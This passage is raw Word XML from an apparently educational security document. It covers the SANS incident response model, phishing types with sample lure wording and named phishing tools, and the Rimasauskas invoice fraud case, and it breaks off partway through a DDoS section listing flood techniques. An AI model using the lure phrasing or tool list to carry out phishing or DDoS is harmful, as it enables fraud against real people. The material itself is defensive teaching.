          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SysAdmin</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Audit, Network, Security) Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="66689D4D" w14:textId="68E99363">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The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SANS Institute</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provides a practical, field-oriented incident response model designed primarily for training and operational environments. Its six-step framework —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Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned</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 focuses on giving responders a simple yet effective roadmap for managing incidents in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="3CB29122" w14:textId="01DCCCA1">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The SANS model is widely used by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Security Operations Centers (SOC)</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and cybersecurity professionals because of its hands-on nature and its emphasis on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speed, documentation, and adaptability</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It also complements technical training and certifications (such as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GIAC</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) that enhance responders’ capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="30BF09A2" w14:textId="70FFD8BA">
      <w:pPr>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While it does not have the formal governance integration of ISO/IEC 27035 or the structural depth of NIST, SANS </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remains</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an excellent operational framework for teams that prioritize </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>practical execution, continuous improvement, and rapid response</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="0FF79414" w14:textId="2F321EA1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="48E38E0D" w:rsidP="732EE1AE" w:rsidRDefault="48E38E0D" w14:paraId="632FF5C5" w14:textId="47B50F91">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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8E38E0D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Case Studies and Best Practices</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1BA89190" w14:textId="26BB6CDF">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Definition of Phishing</w:t>
      </w:r>
      <w:r>
        <w:br/>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Phishing is a type of cyber-attack aimed at deceiving users to obtain sensitive information such as passwords, credit card numbers, or other personal data. Usually, the attacker appears as a trusted entity (such as a bank, email service, or popular website) to convince the victim to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disclose</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their information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1DF32B08" w14:textId="7B65449F">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Methods of Executing Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2F8535A7" w14:textId="54054122">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A. Email Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="700E29E7" w14:textId="046F9370">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Description: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The most common; the attacker sends a message that appears legitimate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1D5D8286" w14:textId="0503E9DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Goal:</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To trick the user into opening a link or downloading a malicious file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2A757B68" w14:textId="2F244462">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Example:</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A message from the "bank" asking to update account information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="52C976C1" w14:textId="0BEDF0B6">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B. SMS Phishing (Smishing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7FDF1109" w14:textId="5D366EF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Description: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Sending text messages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containing</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malicious links.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7508396D" w14:textId="1F4384FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Goal:</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To trick the user into clicking the link or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submitting</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their data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="06E42646" w14:textId="526713AD">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C. Voice Phishing (Vishing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="555D522F" w14:textId="432460BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Description: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The attacker calls the victim and requests sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0928052E" w14:textId="591E22CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Goal:</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To obtain financial data or passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7C92AC47" w14:textId="60009438">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 Website Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="27CA3037" w14:textId="7DB7EC09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Description: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Creating a fake copy of a popular website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="10C67004" w14:textId="5C62AF31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Goal:</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To have the user enter their data on the fake site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="47120FDD" w14:textId="49424CA9">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E. Social Media Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="018B01E3" w14:textId="2D2B3279">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Sending fake links or messages appearing to come from the victim's friends or official pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7AAF1D0C" w14:textId="55834AA6">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Tools Used in Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="62256765" w14:textId="5B01DA4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Tools for Creating Fake Messages and Websites:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2D16121C" w14:textId="1EB7675D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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SET (Social Engineering Toolkit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6D602C04" w14:textId="6143A1B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Gophish</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="3F62815B" w14:textId="24E87DA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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King Phisher</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="17F24DA4" w14:textId="29A887DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Tracking and Data Collection Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="30ED97DA" w14:textId="6D50ECC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="384BD897" w14:textId="282CEC10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7FB8A733" w14:textId="05D1E0D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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URL Shorteners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="11B5DE07" w14:textId="5C61AF5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Campaign Management Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="3DC69613" w14:textId="7F17A79F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Email Spoofers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="729E8D3D" w14:textId="7E4C50F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Phishing Kits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="24B7D9F9" w14:textId="1824DA2E">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Persuasion Techniques Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1C1A9C29" w14:textId="4C8EFAED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Urgency/Threat:</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"Your account will be blocked within 24 hours; click here to update your information."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="3CD36328" w14:textId="76EEF2D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Trust/Familiarity:</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Using logos of well-known companies, fake signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="12DDE6D1" w14:textId="1D42326B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Reward:</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"Win a prize, click here to participate."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="20FEBCE9" w14:textId="09A5F715">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Emotional Appeal:</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Messages that provoke fear, pride, or greed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="3083418A" w14:textId="0D66968A">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Tips for Protecting Against Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="317E567B" w14:textId="6CD86065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Do not click on suspicious links.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="213D7754" w14:textId="359AEE1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Verify official website addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="56A85D82" w14:textId="6B5E2EC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Use two-factor authentication (2FA).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="73BE63CD" w14:textId="42265328">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Regularly update antivirus software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7FFF5648" w14:textId="103F6A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Train employees to recognize phishing messages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2F97F3A0" w14:textId="2170995C">
      <w:p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Case Study – Google and Facebook Phishing Scam (2013–2015):</w:t>
      </w:r>
      <w:r>
        <w:br/>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Between 2013 and 2015, a Lithuanian cybercriminal,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 xml:space="preserve">Evaldas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Rimasauskas</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impersonated a hardware vendor that both Google and Facebook </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>regularly worked</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with. By sending fake invoices and contracts through email, he successfully tricked employees into transferring over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$100 million</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to bank accounts he controlled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6ADE2AE3" w14:textId="2FD9E704">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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Impact:</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Significant </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>financial loss</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and reputational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="76DC4080" w14:textId="0D3B6EA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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Lesson Learned:</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Even highly secure organizations can fall victim without robust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email verification, payment validation procedures, and employee awareness programs</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61502522" w14:textId="789352BE">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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="01F405C5" w14:textId="458BC94A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Deploy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email filters and domain protection</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(SPF, DKIM, DMARC).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7C43A984" w14:textId="18FFF45A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Conduct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phishing simulation training</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for employees.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1FD7C73D" w14:textId="59532F9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Use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multi-factor authentication (MFA)</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1B15DE8C" w14:textId="7A59D275">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Implement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URL scanning and sandboxing tools</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for attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="5BF711D4" w14:textId="1AA8ABAC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="03B1EF34" w14:textId="2563338F">
      <w:pPr>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p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="04D3B505" w14:textId="2D8668C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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32"/>
          <w:szCs w:val="32"/>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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="3C4CC614" w14:textId="5373D5D2">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Definition of DDoS</w:t>
      </w:r>
      <w:r>
        <w:br/>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A DDoS attack is an attempt to stop a service or website from functioning by sending a massive number of requests that exceed the server's capacity to handle them, making the site or service unavailable to legitimate users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1DE2DC9E" w14:textId="7363DD17">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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="552EAF55" w14:textId="21CC294A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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The attack is often distributed (Botnet).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="05603C80" w14:textId="6B923755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Targets can include websites, servers, networks, or online services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6D58CA7A" w14:textId="0596E60D">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Methods of Executing DDoS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="44B0FDE9" w14:textId="15C8ABCF">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A. Volume-Based Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="250DC6F0" w14:textId="71115298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Floods the network with data until it stops responding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6A0056D0" w14:textId="2AE69B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Examples: UDP Flood, ICMP Flood.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="4EED9709" w14:textId="40A93F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Goal: Consume bandwidth of the server or network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2E3B4612" w14:textId="15789DE0">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B. Protocol Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="21580DE1" w14:textId="0AECC1EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Targets network protocol layers like TCP/IP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="73390C8F" w14:textId="0ED1BF3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Examples: SYN Flood, Ping of Death.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="04B20AB7" w14:textId="3997196F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Goal: Consume server resources (Memory &amp; CPU).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6E1DCFDF" w14:textId="1D6C8F5B">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C. Application Layer Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="45A06D04" w14:textId="6DB62DE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Targets the application or service itself, like web pages or databases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="28F755E8" w14:textId="5EDC61B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Examples: HTTP Flood,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Slowloris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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6F6DD0CF" w14:textId="5FB18D07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Goal: Gradually exhaust server resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="3B5AC1B2" w14:textId="118AF48F">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Tools Used in DDoS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0E086627" w14:textId="68971AD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
